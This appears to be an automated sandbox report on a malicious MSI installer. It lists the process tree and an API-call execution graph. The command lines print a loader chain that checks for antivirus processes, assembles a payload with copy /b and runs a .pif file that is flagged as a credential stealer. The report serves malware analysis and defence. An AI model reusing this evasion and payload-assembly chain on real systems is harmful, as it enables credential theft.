                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=py5V%2BTiLgW24WjXEFMJgVM%2BCai2Jp0agHhqEPYgvu72d6Hzgd%2B2A4MYGC%2FaUOF21XT1nZvaunG6JzroTE03dAP3bwWPFxQM2FT%2FVV1JIycrfsp8EXOvDu3IwHfkMG0REdPnZT5zD"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 8a8a94c15f2dc33c-EWR
                                            alt-svc: h3=":443"; ma=86400
                                            2024-07-25 07:54:18 UTC54INData Raw: 33 30 0d 0a 39 67 63 42 71 42 31 65 2b 58 59 63 53 32 6c 56 36 4b 6a 39 66 6d 56 34 36 6b 6a 58 38 4e 5a 69 79 4a 76 68 6e 6a 58 4d 30 6a 57 74 57 67 3d 3d 0d 0a
                                            Data Ascii: 309gcBqB1e+XYcS2lV6Kj9fmV46kjX8NZiyJvhnjXM0jWtWg==
                                            2024-07-25 07:54:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Click to jump to process

                                            Click to jump to process

                                            Click to dive into process behavior distribution

                                            Click to jump to process

                                            Target ID:1
                                            Start time:03:52:27
                                            Start date:25/07/2024
                                            Path:C:\Windows\System32\msiexec.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\NB4EASbynx.msi"
                                            Imagebase:0x7ff61f270000
                                            File size:69'632 bytes
                                            MD5 hash:E5DA170027542E25EDE42FC54C929077
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:2
                                            Start time:03:52:28
                                            Start date:25/07/2024
                                            Path:C:\Windows\System32\msiexec.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\msiexec.exe /V
                                            Imagebase:0x7ff61f270000
                                            File size:69'632 bytes
                                            MD5 hash:E5DA170027542E25EDE42FC54C929077
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:false

                                            Target ID:3
                                            Start time:03:52:30
                                            Start date:25/07/2024
                                            Path:C:\Windows\SysWOW64\msiexec.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 4C0B4EE6A62E23CFF044B1F01FFADBEC C
                                            Imagebase:0x360000
                                            File size:59'904 bytes
                                            MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:4
                                            Start time:03:52:31
                                            Start date:25/07/2024
                                            Path:C:\Users\user\AppData\Local\Temp\MSI53B9.tmp
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\AppData\Local\Temp\MSI53B9.tmp" -pqwerty2023 -s1
                                            Imagebase:0x870000
                                            File size:1'422'662 bytes
                                            MD5 hash:689E01A34A731C6F051E39CD55FB71AD
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Antivirus matches:
                                            • Detection: 8%, ReversingLabs
                                            Reputation:low
                                            Has exited:true

                                            Target ID:8
                                            Start time:03:53:00
                                            Start date:25/07/2024
                                            Path:C:\Users\user\Desktop\SymposiumTaiwan.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\SymposiumTaiwan.exe"
                                            Imagebase:0x400000
                                            File size:895'074'384 bytes
                                            MD5 hash:9A721DDFD6C94D81EF78858A85F1083A
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:low
                                            Has exited:true

                                            Target ID:10
                                            Start time:03:53:00
                                            Start date:25/07/2024
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\cmd.exe" /k copy Open Open.cmd & Open.cmd & exit
                                            Imagebase:0x1c0000
                                            File size:236'544 bytes
                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:11
                                            Start time:03:53:00
                                            Start date:25/07/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff66e660000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:12
                                            Start time:03:53:02
                                            Start date:25/07/2024
                                            Path:C:\Windows\SysWOW64\tasklist.exe
                                            Wow64 process (32bit):true
                                            Commandline:tasklist
                                            Imagebase:0x8a0000
                                            File size:79'360 bytes
                                            MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:true

                                            Target ID:13
                                            Start time:03:53:02
                                            Start date:25/07/2024
                                            Path:C:\Windows\SysWOW64\findstr.exe
                                            Wow64 process (32bit):true
                                            Commandline:findstr /I "wrsa.exe opssvc.exe"
                                            Imagebase:0x3a0000
                                            File size:29'696 bytes
                                            MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:true

                                            Target ID:14
                                            Start time:03:53:02
                                            Start date:25/07/2024
                                            Path:C:\Windows\SysWOW64\tasklist.exe
                                            Wow64 process (32bit):true
                                            Commandline:tasklist
                                            Imagebase:0x8a0000
                                            File size:79'360 bytes
                                            MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:true

                                            Target ID:15
                                            Start time:03:53:02
                                            Start date:25/07/2024
                                            Path:C:\Windows\SysWOW64\findstr.exe
                                            Wow64 process (32bit):true
                                            Commandline:findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"
                                            Imagebase:0x3a0000
                                            File size:29'696 bytes
                                            MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:true

                                            Target ID:16
                                            Start time:03:53:03
                                            Start date:25/07/2024
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:cmd /c md 558563
                                            Imagebase:0x1c0000
                                            File size:236'544 bytes
                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:17
                                            Start time:03:53:03
                                            Start date:25/07/2024
                                            Path:C:\Windows\SysWOW64\findstr.exe
                                            Wow64 process (32bit):true
                                            Commandline:findstr /V "cbsinchhavefcc" Basketball
                                            Imagebase:0x3a0000
                                            File size:29'696 bytes
                                            MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:18
                                            Start time:03:53:04
                                            Start date:25/07/2024
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:cmd /c copy /b Upc + Beverages + Hero + Displaying + Version + Fm + Emotions 558563\k
                                            Imagebase:0x1c0000
                                            File size:236'544 bytes
                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:19
                                            Start time:03:53:04
                                            Start date:25/07/2024
                                            Path:C:\Users\user\AppData\Local\Temp\558563\Dicks.pif
                                            Wow64 process (32bit):true
                                            Commandline:558563\Dicks.pif 558563\k
                                            Imagebase:0x30000
                                            File size:893'608 bytes
                                            MD5 hash:6EE7DDEBFF0A2B78C7AC30F6E00D1D11
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Antivirus matches:
                                            • Detection: 7%, ReversingLabs
                                            Has exited:true

                                            Target ID:20
                                            Start time:03:53:04
                                            Start date:25/07/2024
                                            Path:C:\Windows\SysWOW64\timeout.exe
                                            Wow64 process (32bit):true
                                            Commandline:timeout 5
                                            Imagebase:0x9a0000
                                            File size:25'088 bytes
                                            MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:21
                                            Start time:03:53:09
                                            Start date:25/07/2024
                                            Path:C:\Windows\SysWOW64\msiexec.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 6E4C0896962209942EF6224878A6EC23
                                            Imagebase:0x360000
                                            File size:59'904 bytes
                                            MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:23
                                            Start time:03:53:57
                                            Start date:25/07/2024
                                            Path:C:\Users\user\AppData\Local\Temp\558563\Dicks.pif
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\user\AppData\Local\Temp\558563\Dicks.pif
                                            Imagebase:0x30000
                                            File size:893'608 bytes
                                            MD5 hash:6EE7DDEBFF0A2B78C7AC30F6E00D1D11
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000017.00000003.3156346560.00000000011C6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000017.00000003.3198982673.00000000011C6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000017.00000003.3156175797.00000000011C6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000017.00000003.3155203388.00000000011C3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000017.00000003.3182152456.00000000011C5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000017.00000003.3179568692.00000000011C3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000017.00000003.3182152456.0000000001173000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000017.00000003.3182027461.00000000011C3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000017.00000003.3196037635.00000000011C5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000017.00000003.3179989281.00000000011C5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            Has exited:true

                                            Reset < >

                                              Execution Graph

                                              Execution Coverage:11.1%
                                              Dynamic/Decrypted Code Coverage:0%
                                              Signature Coverage:9.5%
                                              Total number of Nodes:1504
                                              Total number of Limit Nodes:26
                                              execution_graph 22005 871383 75 API calls 3 library calls 23906 879481 72 API calls 23183 88c782 23184 88c730 23183->23184 23184->23183 23185 88cabc ___delayLoadHelper2@8 19 API calls 23184->23185 23185->23184 23956 889584 GetDlgItem EnableWindow ShowWindow SendMessageW 23957 88899a GdipCloneImage GdipAlloc 24011 897b9a FreeLibrary 23978 890e9d 48 API calls 23792 897695 23793 8976a0 23792->23793 23795 8976c9 23793->23795 23797 8976c5 23793->23797 23798 8979a7 23793->23798 23805 8976ed DeleteCriticalSection 23795->23805 23799 897735 _abort 5 API calls 23798->23799 23800 8979ce 23799->23800 23801 8979ec InitializeCriticalSectionAndSpinCount 23800->23801 23802 8979d7 23800->23802 23801->23802 23803 88d783 DloadLock 5 API calls 23802->23803 23804 897a03 23803->23804 23804->23793 23805->23797 23981 877a9b GetCurrentProcess GetLastError CloseHandle 24012 88aa99 91 API calls 3 library calls 23982 898aaa GetProcessHeap 23827 8710a9 23832 875b35 23827->23832 23833 875b3f __EH_prolog 23832->23833 23834 87ac66 75 API calls 23833->23834 23835 875b4b 23834->23835 23839 875d2a GetCurrentProcess GetProcessAffinityMask 23835->23839 24016 88e7b0 51 API calls 2 library calls 24017 884fb5 120 API calls __vswprintf_c_l 24019 896fcb 71 API calls _free 23986 8886cb 21 API calls 23987 88aa99 101 API calls 4 library calls 23133 88c7c0 23135 88c791 23133->23135 23136 88cabc 23135->23136 23164 88c7ca 23136->23164 23138 88cad6 23139 88cb33 23138->23139 23144 88cb57 23138->23144 23175 88ca3a 11 API calls 3 library calls 23139->23175 23141 88cb3e RaiseException 23158 88cd2c 23141->23158 23142 88cbcf LoadLibraryExA 23145 88cc30 23142->23145 23146 88cbe2 GetLastError 23142->23146 23143 88d783 DloadLock 5 API calls 23147 88cd3b 23143->23147 23144->23142 23144->23145 23148 88ccfe 23144->23148 23150 88cc42 23144->23150 23149 88cc3b FreeLibrary 23145->23149 23145->23150 23151 88cc0b 23146->23151 23157 88cbf5 23146->23157 23147->23135 23178 88ca3a 11 API calls 3 library calls 23148->23178 23149->23150 23150->23148 23152 88cca0 GetProcAddress 23150->23152 23176 88ca3a 11 API calls 3 library calls 23151->23176 23152->23148 23154 88ccb0 GetLastError 23152->23154 23160 88ccc3 23154->23160 23155 88cc16 RaiseException 23155->23158 23157->23145 23157->23151 23158->23143 23160->23148 23177 88ca3a 11 API calls 3 library calls 23160->23177 23161 88cce4 RaiseException 23162 88c7ca ___delayLoadHelper2@8 11 API calls 23161->23162 23163 88ccfb 23162->23163 23163->23148 23165 88c7fc 23164->23165 23166 88c7d6 23164->23166 23165->23138 23179 88c878 8 API calls DloadLock 23166->23179 23168 88c7db 23169 88c7f7 23168->23169 23180 88c9ca VirtualQuery GetSystemInfo VirtualProtect DloadObtainSection DloadMakePermanentImageCommit 23168->23180 23181 88c7fd GetModuleHandleW GetProcAddress GetProcAddress 23169->23181 23172 88ca87 23173 88d783 DloadLock 5 API calls 23172->23173 23174 88cab8 23173->23174 23174->23138 23175->23141 23176->23155 23177->23161 23178->23158 23179->23168 23180->23169 23181->23172 23959 8971c0 31 API calls 2 library calls 24021 8863c3 115 API calls 23187 879bc8 23188 879bd4 23187->23188 23189 879bdb 23187->23189 23190 879be1 GetStdHandle 23189->23190 23192 879bec 23189->23192 23190->23192 23191 879c41 WriteFile 23191->23192 23192->23188 23192->23191 23193 879c11 WriteFile 23192->23193 23194 879c0c 23192->23194 23196 879cb4 23192->23196 23198 876d5a 56 API calls 23192->23198 23193->23192 23193->23194 23194->23192 23194->23193 23199 876f67 68 API calls 23196->23199 23198->23192 23199->23188 23917 88aa99 96 API calls 4 library calls 24022 894bda 52 API calls 2 library calls 23207 88c0d0 23208 88c0dd 23207->23208 23209 87d142 54 API calls 23208->23209 23210 88c0f1 23209->23210 23211 873f5b _swprintf 51 API calls 23210->23211 23212 88c103 SetDlgItemTextW 23211->23212 23215 88991e PeekMessageW 23212->23215 23216 889939 GetMessageW TranslateMessage DispatchMessageW 23215->23216 23217 88995a 23215->23217 23216->23217 23806 87ddda 23807 87dde2 FreeLibrary 23806->23807 23808 87ddea 23806->23808 23807->23808 23922 887cd5 GetClientRect 23989 894ed4 55 API calls _free 24023 897be8 27 API calls 2 library calls 24024 88c3ea 19 API calls ___delayLoadHelper2@8 23990 8716e3 79 API calls 23923 89c0e4 51 API calls 23925 8988fb GetCommandLineA GetCommandLineW 23961 88d5ff 27 API calls pre_c_initialization 23844 8718fb 127 API calls __EH_prolog 23962 893501 QueryPerformanceFrequency QueryPerformanceCounter 24027 89c301 21 API calls __vswprintf_c_l 23994 890a00 6 API calls 4 library calls 23930 88d002 38 API calls 2 library calls 24028 896f03 21 API calls 2 library calls 23218 88d611 23219 88d61d ___FrameUnwindToState 23218->23219 23244 88d126 23219->23244 23221 88d624 23223 88d64d 23221->23223 23321 88da75 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 23221->23321 23228 88d68c ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 23223->23228 23255 89572c 23223->23255 23227 88d66c ___FrameUnwindToState 23234 88d6ec 23228->23234 23322 894760 38 API calls 3 library calls 23228->23322 23263 88db90 23234->23263 23239 88d718 23241 88d721 23239->23241 23323 894b67 28 API calls _abort 23239->23323 23324 88d29d 13 API calls 2 library calls 23241->23324 23245 88d12f 23244->23245 23325 88d8cb IsProcessorFeaturePresent 23245->23325 23247 88d13b 23326 890b66 23247->23326 23249 88d140 23250 88d144 23249->23250 23335 8955b9 23249->23335 23250->23221 23253 88d15b 23253->23221 23256 895743 23255->23256 23257 88d783 DloadLock 5 API calls 23256->23257 23258 88d666 23257->23258 23258->23227 23259 8956d0 23258->23259 23261 8956ff 23259->23261 23260 88d783 DloadLock 5 API calls 23262 895728 23260->23262 23261->23260 23262->23228 23385 88dea0 23263->23385 23266 88d6f2 23267 89567d 23266->23267 23387 898558 23267->23387 23269 895686 23270 88d6fb 23269->23270 23391 8988e3 38 API calls 23269->23391 23272 88c131 23270->23272 23526 87f353 23272->23526 23276 88c150 23575 889036 23276->23575 23278 88c159 23579 880722 GetCPInfo 23278->23579 23280 88c163 ___scrt_get_show_window_mode 23281 88c176 GetCommandLineW 23280->23281 23282 88c203 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 23281->23282 23283 88c185 23281->23283 23284 873f5b _swprintf 51 API calls 23282->23284 23582 88a8d4 23283->23582 23286 88c26c SetEnvironmentVariableW GetModuleHandleW LoadIconW 23284->23286 23595 889a76 LoadBitmapW 23286->23595 23289 88c1fd 23589 88be0a 23289->23589 23290 88c193 OpenFileMappingW 23293 88c1ac MapViewOfFile 23290->23293 23294 88c1f3 CloseHandle 23290->23294 23296 88c1ea UnmapViewOfFile 23293->23296 23297 88c1bd __vswprintf_c_l 23293->23297 23294->23282 23296->23294 23298 88be0a 2 API calls 23297->23298 23299 88c1d9 23298->23299 23299->23296 23300 88c2b3 23301 88c2c5 DialogBoxParamW 23300->23301 23302 88c2ff 23301->23302 23303 88c318 23302->23303 23304 88c311 Sleep 23302->23304 23306 88c326 23303->23306 23620 889237 CompareStringW SetCurrentDirectoryW ___scrt_get_show_window_mode 23303->23620 23304->23303 23307 88c345 DeleteObject 23306->23307 23308 88c35c DeleteObject 23307->23308 23309 88c35f 23307->23309 23308->23309 23310 88c390 23309->23310 23311 88c3a2 23309->23311 23621 88be69 WaitForSingleObject PeekMessageW WaitForSingleObject 23310->23621 23618 88909e 23311->23618 23313 88c396 CloseHandle 23313->23311 23315 88c3dc 23316 894a9b GetModuleHandleW 23315->23316 23317 88d70e 23316->23317 23317->23239 23318 894bc4 23317->23318 23720 894941 23318->23720 23321->23221 23322->23234 23323->23241 23324->23227 23325->23247 23327 890b6b ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 23326->23327 23339 891c0e 23327->23339 23330 890b79 23330->23249 23332 890b81 23333 890b8c 23332->23333 23353 891c4a DeleteCriticalSection 23332->23353 23333->23249 23381 898ac5 23335->23381 23338 890b8f 8 API calls 3 library calls 23338->23250 23340 891c17 23339->23340 23342 891c40 23340->23342 23343 890b75 23340->23343 23354 891e85 23340->23354 23359 891c4a DeleteCriticalSection 23342->23359 23343->23330 23345 890ca6 23343->23345 23374 891d9a 23345->23374 23347 890cb0 23352 890cbb 23347->23352 23379 891e48 6 API calls try_get_function 23347->23379 23349 890cc9 23350 890cd6 23349->23350 23380 890cd9 6 API calls ___vcrt_FlsFree 23349->23380 23350->23332 23352->23332 23353->23330 23360 891c79 23354->23360 23357 891ebc InitializeCriticalSectionAndSpinCount 23358 891ea8 23357->23358 23358->23340 23359->23343 23364 891cad 23360->23364 23365 891ca9 23360->23365 23361 891ccd 23363 891cd9 GetProcAddress 23361->23363 23361->23364 23366 891ce9 __crt_fast_encode_pointer 23363->23366 23364->23357 23364->23358 23365->23361 23365->23364 23367 891d19 23365->23367 23366->23364 23368 891d41 LoadLibraryExW 23367->23368 23372 891d36 23367->23372 23369 891d5d GetLastError 23368->23369 23370 891d75 23368->23370 23369->23370 23373 891d68 LoadLibraryExW 23369->23373 23371 891d8c FreeLibrary 23370->23371 23370->23372 23371->23372 23372->23365 23373->23370 23375 891c79 try_get_function 5 API calls 23374->23375 23376 891db4 23375->23376 23377 891dcc TlsAlloc 23376->23377 23378 891dbd 23376->23378 23378->23347 23379->23349 23380->23352 23384 898ade 23381->23384 23382 88d783 DloadLock 5 API calls 23383 88d14d 23382->23383 23383->23253 23383->23338 23384->23382 23386 88dba3 GetStartupInfoW 23385->23386 23386->23266 23388 898561 23387->23388 23389 89856a 23387->23389 23392 898457 23388->23392 23389->23269 23391->23269 23393 89631f _abort 38 API calls 23392->23393 23394 898464 23393->23394 23412 898576 23394->23412 23396 89846c 23421 8981eb 23396->23421 23399 8959fc __onexit 21 API calls 23401 898494 23399->23401 23400 8984c6 23403 8959c2 _free 20 API calls 23400->23403 23401->23400 23428 898618 23401->23428 23405 898483 23403->23405 23405->23389 23406 8984c1 23438 895e3e 20 API calls _abort 23406->23438 23408 89850a 23408->23400 23439 8980c1 26 API calls 23408->23439 23409 8984de 23409->23408 23410 8959c2 _free 20 API calls 23409->23410 23410->23408 23413 898582 ___FrameUnwindToState 23412->23413 23414 89631f _abort 38 API calls 23413->23414 23419 89858c 23414->23419 23416 898610 ___FrameUnwindToState 23416->23396 23419->23416 23420 8959c2 _free 20 API calls 23419->23420 23440 895a4a 38 API calls _abort 23419->23440 23441 8976d6 EnterCriticalSection 23419->23441 23442 898607 LeaveCriticalSection _abort 23419->23442 23420->23419 23422 892636 __fassign 38 API calls 23421->23422 23423 8981fd 23422->23423 23424 89820c GetOEMCP 23423->23424 23425 89821e 23423->23425 23426 898235 23424->23426 23425->23426 23427 898223 GetACP 23425->23427 23426->23399 23426->23405 23427->23426 23429 8981eb 40 API calls 23428->23429 23430 898637 23429->23430 23433 898688 IsValidCodePage 23430->23433 23435 89863e 23430->23435 23436 8986ad ___scrt_get_show_window_mode 23430->23436 23431 88d783 DloadLock 5 API calls 23432 8984b9 23431->23432 23432->23406 23432->23409 23434 89869a GetCPInfo 23433->23434 23433->23435 23434->23435 23434->23436 23435->23431 23443 8982c3 GetCPInfo 23436->23443 23438->23400 23439->23400 23441->23419 23442->23419 23444 8983a7 23443->23444 23449 8982fd 23443->23449 23446 88d783 DloadLock 5 API calls 23444->23446 23448 898453 23446->23448 23448->23435 23453 8993f3 23449->23453 23452 8975cb __vswprintf_c_l 43 API calls 23452->23444 23454 892636 __fassign 38 API calls 23453->23454 23455 899413 MultiByteToWideChar 23454->23455 23457 8994e9 23455->23457 23458 899451 23455->23458 23459 88d783 DloadLock 5 API calls 23457->23459 23460 8959fc __onexit 21 API calls 23458->23460 23463 899472 __vswprintf_c_l ___scrt_get_show_window_mode 23458->23463 23461 89835e 23459->23461 23460->23463 23467 8975cb 23461->23467 23462 8994e3 23472 897616 20 API calls _free 23462->23472 23463->23462 23465 8994b7 MultiByteToWideChar 23463->23465 23465->23462 23466 8994d3 GetStringTypeW 23465->23466 23466->23462 23468 892636 __fassign 38 API calls 23467->23468 23469 8975de 23468->23469 23473 8973ae 23469->23473 23472->23457 23475 8973c9 __vswprintf_c_l 23473->23475 23474 8973ef MultiByteToWideChar 23476 897419 23474->23476 23477 8975a3 23474->23477 23475->23474 23480 8959fc __onexit 21 API calls 23476->23480 23482 89743a __vswprintf_c_l 23476->23482 23478 88d783 DloadLock 5 API calls 23477->23478 23479 8975b6 23478->23479 23479->23452 23480->23482 23481 897483 MultiByteToWideChar 23483 89749c 23481->23483 23495 8974ef 23481->23495 23482->23481 23482->23495 23500 897a09 23483->23500 23487 8974fe 23491 8959fc __onexit 21 API calls 23487->23491 23494 89751f __vswprintf_c_l 23487->23494 23488 8974c6 23489 897a09 __vswprintf_c_l 11 API calls 23488->23489 23488->23495 23489->23495 23490 897594 23508 897616 20 API calls _free 23490->23508 23491->23494 23492 897a09 __vswprintf_c_l 11 API calls 23496 897573 23492->23496 23494->23490 23494->23492 23509 897616 20 API calls _free 23495->23509 23496->23490 23497 897582 WideCharToMultiByte 23496->23497 23497->23490 23498 8975c2 23497->23498 23510 897616 20 API calls _free 23498->23510 23511 897735 23500->23511 23504 897a79 LCMapStringW 23505 897a39 23504->23505 23506 88d783 DloadLock 5 API calls 23505->23506 23507 8974b3 23506->23507 23507->23487 23507->23488 23507->23495 23508->23495 23509->23477 23510->23495 23512 897765 23511->23512 23515 897761 23511->23515 23512->23505 23518 897a91 10 API calls 3 library calls 23512->23518 23513 897785 23513->23512 23516 897791 GetProcAddress 23513->23516 23515->23512 23515->23513 23519 8977d1 23515->23519 23517 8977a1 __crt_fast_encode_pointer 23516->23517 23517->23512 23518->23504 23520 8977f2 LoadLibraryExW 23519->23520 23525 8977e7 23519->23525 23521 89780f GetLastError 23520->23521 23522 897827 23520->23522 23521->23522 23523 89781a LoadLibraryExW 23521->23523 23524 89783e FreeLibrary 23522->23524 23522->23525 23523->23522 23524->23525 23525->23515 23527 88cec0 23526->23527 23528 87f35d GetModuleHandleW 23527->23528 23529 87f377 GetProcAddress 23528->23529 23530 87f3c8 23528->23530 23532 87f3a0 GetProcAddress 23529->23532 23533 87f390 23529->23533 23531 87f6fd GetModuleFileNameW 23530->23531 23622 89462a 42 API calls __vswprintf_c_l 23530->23622 23546 87f718 23531->23546 23532->23530 23535 87f3ac 23532->23535 23533->23532 23535->23530 23536 87f63b 23536->23531 23537 87f646 GetModuleFileNameW CreateFileW 23536->23537 23538 87f675 SetFilePointer 23537->23538 23539 87f6f1 CloseHandle 23537->23539 23538->23539 23540 87f685 ReadFile 23538->23540 23539->23531 23540->23539 23543 87f6a4 23540->23543 23541 87a8e0 GetVersionExW 23541->23546 23542 87f309 2 API calls 23542->23546 23543->23539 23545 87f309 2 API calls 23543->23545 23544 87f74d CompareStringW 23544->23546 23545->23543 23546->23541 23546->23542 23546->23544 23547 87f783 GetFileAttributesW 23546->23547 23548 87f797 23546->23548 23547->23546 23547->23548 23549 87f7a4 23548->23549 23552 87f7d6 23548->23552 23551 87f7bc GetFileAttributesW 23549->23551 23554 87f7d0 23549->23554 23550 87f8e5 23574 888b8e GetCurrentDirectoryW 23550->23574 23551->23549 23551->23554 23552->23550 23553 87a8e0 GetVersionExW 23552->23553 23555 87f7f0 23553->23555 23554->23552 23556 87f7f7 23555->23556 23557 87f85d 23555->23557 23559 87f309 2 API calls 23556->23559 23558 873f5b _swprintf 51 API calls 23557->23558 23560 87f885 AllocConsole 23558->23560 23561 87f801 23559->23561 23562 87f892 GetCurrentProcessId AttachConsole 23560->23562 23563 87f8dd ExitProcess 23560->23563 23564 87f309 2 API calls 23561->23564 23623 8920b3 23562->23623 23566 87f80b 23564->23566 23568 87d142 54 API calls 23566->23568 23567 87f8b3 GetStdHandle WriteConsoleW Sleep FreeConsole 23567->23563 23569 87f826 23568->23569 23570 873f5b _swprintf 51 API calls 23569->23570 23571 87f839 23570->23571 23572 87d142 54 API calls 23571->23572 23573 87f848 23572->23573 23573->23563 23574->23276 23576 87f309 2 API calls 23575->23576 23577 88904a OleInitialize 23576->23577 23578 88906d GdiplusStartup SHGetMalloc 23577->23578 23578->23278 23580 880746 IsDBCSLeadByte 23579->23580 23580->23580 23581 88075e 23580->23581 23581->23280 23583 88a8de 23582->23583 23584 88a9f4 23583->23584 23585 88a926 CharUpperW 23583->23585 23586 88a9a9 CharUpperW 23583->23586 23587 88a94d CharUpperW 23583->23587 23588 87dfde 73 API calls 23583->23588 23584->23289 23584->23290 23585->23583 23586->23583 23587->23583 23588->23583 23590 88cec0 23589->23590 23591 88be17 SetEnvironmentVariableW 23590->23591 23593 88be3a 23591->23593 23592 88be62 23592->23282 23593->23592 23594 88be56 SetEnvironmentVariableW 23593->23594 23594->23592 23596 889aa0 GetObjectW 23595->23596 23597 889a97 23595->23597 23599 888ac0 6 API calls 23596->23599 23625 888bd0 FindResourceW 23597->23625 23600 889ab2 23599->23600 23602 889af3 23600->23602 23603 889ad3 23600->23603 23604 888bd0 12 API calls 23600->23604 23613 87caa7 23602->23613 23639 888b22 GetDC GetDeviceCaps ReleaseDC 23603->23639 23606 889ac8 23604->23606 23606->23603 23608 889ace DeleteObject 23606->23608 23607 889adb 23640 888adf GetDC GetDeviceCaps ReleaseDC 23607->23640 23608->23603 23610 889ae4 23641 888cf3 8 API calls ___scrt_get_show_window_mode 23610->23641 23612 